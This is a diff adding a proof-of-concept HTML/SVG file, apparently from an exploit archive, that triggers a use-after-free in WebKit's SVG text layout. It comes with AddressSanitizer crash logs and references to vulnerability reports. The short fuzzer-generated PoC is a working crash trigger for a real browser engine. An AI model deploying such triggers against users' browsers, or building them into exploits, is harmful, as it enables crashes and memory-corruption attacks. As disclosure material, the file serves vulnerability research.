+    #14 0x6515e3197 in WebCore::RenderTreeUpdater::popParent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b96197)
+    #15 0x6515e2357 in WebCore::RenderTreeUpdater::popParentsToDepth(unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b95357)
+    #16 0x6515e21cb in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b951cb)
+    #17 0x6515e170a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9470a)
+    #18 0x64fe99cdd in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244ccdd)
+    #19 0x64fe9b351 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244e351)
+    #20 0x64febd996 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2470996)
+    #21 0x6504e5e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #22 0x65077670b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #23 0x65073fdeb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #24 0x650882097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #25 0x65087eabe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #26 0x650815f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #27 0x648dec7cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #28 0x648df0d2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #29 0x648df002e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37ddeab) in WebCore::RenderLayer::updateDescendantDependentFlags(WTF::HashSet<WebCore::RenderObject const*, WTF::PtrHash<WebCore::RenderObject const*>, WTF::HashTraits<WebCore::RenderObject const*> >*)
+Shadow bytes around the buggy address:
+  0x1c2400007a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400007a60: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
+  0x1c2400007a70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2400007a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400007a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x1c2400007aa0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd
+  0x1c2400007ab0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400007ac0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400007ad0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2400007ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400007af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==25159==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186657
+Apple product security report ID: 693279676
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45488.html b/exploits/multiple/dos/45488.html
new file mode 100644
index 000000000..d00e655a2
--- /dev/null
+++ b/exploits/multiple/dos/45488.html
@@ -0,0 +1,204 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of the latest WebKit source on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<style>
+tref, feMerge, title { inherit; float: right; none; 81em }
+</style>
+<script>
+function jsfuzzer() {
+try { var var00006 = htmlvar00002.getSVGDocument(); } catch(e) { }
+try { var var00162 = document.head; } catch(e) { }
+try { htmlvar00015.setSelectionRange(2,56); } catch(e) { }
+try { var00162.replaceWith(htmlvar00022); } catch(e) { }
+}
+</script>
+<body onload=jsfuzzer()>
+<input id="htmlvar00015" behavior="alternate" radiogroup="group">
+<base id="htmlvar00022" loop="7"></base>
+<svg diffuseConstant="1">
+<text 1" + 1s">
+<set id="svgvar00016" text-rendering="geometricPrecision" />
+<tref text-decoration="overline" display="block" href="x">
+</tref>
+<animateTransform />
+Text</text>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==25081==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000085320 at pc 0x0006fbb20767 bp 0x7ffee1e2c9c0 sp 0x7ffee1e2c9b8
+READ of size 8 at 0x612000085320 thread T0
+==25081==WARNING: invalid path to external symbolizer!
+==25081==WARNING: Failed to use and restart external symbolizer!
+    #0 0x6fbb20766 in WebCore::SVGTextLayoutAttributes::context() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b20766)
+    #1 0x6fbb69867 in WebCore::SVGTextLayoutEngine::currentLogicalCharacterAttributes(WebCore::SVGTextLayoutAttributes*&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b69867)
+    #2 0x6fbb67931 in WebCore::SVGTextLayoutEngine::layoutTextOnLineOrPath(WebCore::SVGInlineTextBox&, WebCore::RenderSVGInlineText&, WebCore::RenderStyle const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b67931)
+    #3 0x6fbb5ff7f in WebCore::SVGTextLayoutEngine::layoutInlineTextBox(WebCore::SVGInlineTextBox&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5ff7f)
+    #4 0x6fbb5f54f in WebCore::SVGRootInlineBox::layoutCharactersInTextBoxes(WebCore::InlineFlowBox*, WebCore::SVGTextLayoutEngine&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5f54f)
+    #5 0x6fbb5f18a in WebCore::SVGRootInlineBox::computePerCharacterLayoutInformation() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5f18a)
+    #6 0x6fb67d91a in WebCore::RenderBlockFlow::createLineBoxesFromBidiRuns(unsigned int, WebCore::BidiRunList<WebCore::BidiRun>&, WebCore::InlineIterator const&, WebCore::LineInfo&, WebCore::VerticalPositionCache&, WebCore::BidiRun*, WTF::Vector<WebCore::WordMeasurement, 64ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x367d91a)
+    #7 0x6fb68013a in WebCore::RenderBlockFlow::layoutRunsAndFloatsInRange(WebCore::LineLayoutState&, WebCore::BidiResolverWithIsolate<WebCore::InlineIterator, WebCore::BidiRun, WebCore::BidiIsolatedRun>&, WebCore::InlineIterator const&, WebCore::BidiStatus const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x368013a)
+    #8 0x6fb67df67 in WebCore::RenderBlockFlow::layoutRunsAndFloats(WebCore::LineLayoutState&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x367df67)
+    #9 0x6fb684f3d in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3684f3d)
+    #10 0x6fbb21686 in WebCore::RenderSVGText::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b21686)
+    #11 0x6fbb43ad2 in WebCore::SVGRenderSupport::layoutChildren(WebCore::RenderElement&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b43ad2)
+    #12 0x6fbb16eea in WebCore::RenderSVGRoot::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b16eea)
+    #13 0x6fb684d82 in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3684d82)
+    #14 0x6fb6249d5 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36249d5)
+    #15 0x6fb5f5832 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f5832)
+    #16 0x6fb62a481 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x362a481)
+    #17 0x6fb6267f0 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36267f0)
+    #18 0x6fb6249e0 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36249e0)
+    #19 0x6fb5f5832 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f5832)
+    #20 0x6fb62a481 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x362a481)
+    #21 0x6fb6267f0 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36267f0)
+    #22 0x6fb6249e0 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36249e0)
+    #23 0x6fb5f5832 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f5832)
+    #24 0x6fb990c63 in WebCore::RenderView::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3990c63)
+    #25 0x6faf3db12 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3db12)
+    #26 0x6fa44d989 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244d989)
+    #27 0x6fad44f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
+    #28 0x6fad431bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
+    #29 0x6fa4709b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
+    #30 0x6faa98e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #31 0x6fad2970b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #32 0x6facf2deb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #33 0x6fae35097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #34 0x6fae31abe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #35 0x6fadc8f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #36 0x10ebc37cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #37 0x10ebc7d2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #38 0x10ebc702e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+    #39 0x10e1af978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
+    #40 0x10df28e2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
+    #41 0x10df32bd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)
+    #42 0x7079f1c07 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fc07)
+    #43 0x7079f2686 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x90686)
+    #44 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #45 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #46 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #47 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #48 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #49 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #50 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #51 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #52 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #53 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #54 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #55 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #56 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #57 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #58 0x10ddcc4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #59 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x612000085320 is located 224 bytes inside of 272-byte region [0x612000085240,0x612000085350)
+freed by thread T0 here:
+    #0 0x111f05fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x707a64f81 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x102f81)
+    #2 0x6fbadd14b in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<272u>, WebCore::RenderSVGInlineText>(bmalloc::api::IsoHeap<WebCore::RenderSVGInlineText>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3add14b)
+    #3 0x6fbb79320 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b79320)
+    #4 0x6fbb81532 in WebCore::RenderTreeBuilder::destroyAndCleanUpAnonymousWrappers(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b81532)
+    #5 0x6fbb98171 in WebCore::RenderTreeUpdater::tearDownTextRenderer(WebCore::Text&, WebCore::RenderTreeBuilder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b98171)
+    #6 0x6fbb955c3 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&, WebCore::Style::TextUpdate const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b955c3)
+    #7 0x6fbb95138 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b95138)
+    #8 0x6fbb9470a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9470a)
+    #9 0x6fa44ccdd in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244ccdd)
+    #10 0x6fa44e351 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244e351)
+    #11 0x6fa44d92e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244d92e)
+    #12 0x6fad44f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
+    #13 0x6fad431bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
+    #14 0x6fa4709b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
+    #15 0x6faa98e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #16 0x6fad2970b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #17 0x6facf2deb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #18 0x6fae35097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #19 0x6fae31abe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #20 0x6fadc8f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #21 0x10ebc37cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #22 0x10ebc7d2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #23 0x10ebc702e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+    #24 0x10e1af978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
+    #25 0x10df28e2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
+    #26 0x10df32bd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)
+    #27 0x7079f1c07 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fc07)
+    #28 0x7079f2686 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x90686)
+    #29 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+
+previously allocated by thread T0 here:
+    #0 0x111f05a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x707a51124 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef124)
+    #3 0x707a64e7c in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x102e7c)
+    #4 0x6fbadcd49 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<272u>, WebCore::RenderSVGInlineText>(bmalloc::api::IsoHeap<WebCore::RenderSVGInlineText>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3adcd49)
+    #5 0x6fa62966d in std::__1::unique_ptr<WebCore::RenderSVGInlineText, WebCore::RenderObjectDeleter> WebCore::createRenderer<WebCore::RenderSVGInlineText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x262966d)
+    #6 0x6fa629455 in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2629455)
+    #7 0x6fbb97bcd in WebCore::RenderTreeUpdater::createTextRenderer(WebCore::Text&, WebCore::Style::TextUpdate const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b97bcd)
